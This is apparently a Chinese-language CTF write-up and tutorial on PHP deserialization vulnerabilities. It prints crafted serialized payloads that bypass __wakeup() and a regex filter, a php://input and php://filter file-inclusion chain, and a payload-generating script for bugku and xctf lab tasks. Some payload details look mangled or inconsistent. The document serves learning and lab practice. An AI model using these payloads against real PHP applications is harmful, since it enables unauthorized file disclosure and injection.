序列化serialize()
序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象:
class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";} O:代表object 1:代表对象名字长度为一个字符 S:对象的名称 1:代表对象里面有一个变量 s:数据类型 4:变量名称的长度 test:变量名称 s:数据类型 7:变量值的长度 pikachu:变量值
反序列化unserialize()
就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。
$u=unserialize("O:1:"S":1:{s:4:"test";s:7:"pikachu";}"); echo $u->test; //得到的结果为pikachu
序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题
常见的几个魔法函数: __construct()当一个对象创建时被调用 __destruct()当一个对象销毁时被调用 __toString()当一个对象被当作一个字符串使用 __sleep() 在对象在被序列化之前运行 __wakeup将在序列化之后立即被调用 漏洞举例: class S{ var $test = "pikachu"; function __destruct(){ echo $this->test; } } $s = $_GET['test']; @$unser = unserialize($a); payload:O:1:"S":1:{s:4:"test";s:29:"";}
php反序列化入门
通过文件下载漏洞下载反序列化源码:
得到后台源码:
class S{
var $test = "pikachu";
function __construct(){
echo $this->test;
}
}
//O:1:"S":1:{s:4:"test";s:29:"";}
$html='';
if(isset($_POST['o'])){
$s = $_POST['o'];
if(!@$unser = unserialize($s)){
$html.="大兄弟,来点劲爆点儿的!
";
}else{
$html.="{$unser->test}
";
}
注释已经给出payload,构造反射xss。
2019-8-27 反序列化更新
bugkuctf web24
打开页面是一个类似淘宝的页面,没什么可点的,查看源码,拉到最低能够看到注释说有/index/index.php.
打开之后是一段php:
class Small_white_rabbit{
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the_f1ag.php
$this->file = 'index.php';
}
}
}
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
@unserialize($var);
} else {
highlight_file("index.php");
}
?>
明显是反序列化,这题对于大佬来说可能非常简单,但对于我这个菜鸡,反序列化没做几题,实际实践也没碰到一次的菜鸡来说,还是比较难的了。
代码要求我们get方式发送var,base64解码,使得反序列化后得到flag。这里一个知识点就是_weakup()魔法函数绕过。因为在我们提交的序列化字符必定要指定**$file为the_flag.php**,而_weakup函数在反序列化后会被调用,检查到file不是index.php就强制修改为index.php。所以必须绕过_weakup()。
上网查资料了解可以利用php反序列化注入漏洞。简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行**。**
这里在构造payload是还要注意$file属性为private,所以在构造时左右两边要加上 .
即:
O:18:"Small_white_rabbit":2:{s:24:".Small_white_rabbit.file";s:12:"the_f1ag.php";}
另外如果属性被protect修饰 则要加*,即:
O:18:"Small_white_rabbit":2:{s:7:".*.file";s:12:"the_flag.php";}
2019.9.12更新
php://input+php://filter+php反序列化
new bugku web21
首先进入题目主页
没有什么东西
右键查看源码
看到提示,后台接收三个参数,并且要求user(文件)值为admin.这里用php://input来控制user的值,post数据为admin。用hackbar构造payload。
绕过第一层判断。
看到include函数,尝试文件包含。
base64解码
error_reporting(E_ALL & ~E_NOTICE);
class Read{//f1a9.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}
?>
有一个toString魔法函数,当一个对象被当作字符串处理时就会执行toString函数。先不管,在读取index页面
#index
error_reporting(E_ALL & ~E_NOTICE);
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
echo "hello admin!
";
if(preg_match("/f1a9/",$file)){
exit();
}else{
include($file); //class.php
$pass = unserialize($pass);//反序列化
echo $pass;
}
}else{
echo "you are not admin ! ";
}
?>
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
echo "hello admin!
";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
-->
可以看到主页进制我们读f1a9.php文件。并且echo了pass。因此需要构造pass序列化字符串,并且file属性为f1a9.php。
构造如下:
O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}
源码:
2019年10月26日更新
在构造反序列化代码最好还是用php一次性构造,否则一些不可见字符是无法我们手工输入准确的。
比如xctf这题。
这题其实比较新的就是这段过滤代码:
if (preg_match('/[oc]:\d+:/i', $var)) {
die('stop hacking!');
不过我们修改对象名字长度为+\d,那么就能绕过认证。
最终这题的payload:
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$a = new Demo("fl4g.php");
$test = serialize($a);
var_dump($test);
echo("\n");
// $test = 'O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}';
$test = str_replace("O:4","O:+4",$test);
$test = str_replace(":1:",":2:",$test);
// var_dump($test);
echo("\n");
echo base64_encode($test);
echo("\n");
// echo($test);
这里想强调的是在生成序列化的过程中最好一次性由php生成。否则会出一些纰漏。
比如
$test1
和$test2变量在字符层面看不出差距,但var_dump明显长度不同。这是因为php反序列化对象时会用不可见字符修饰不同属性。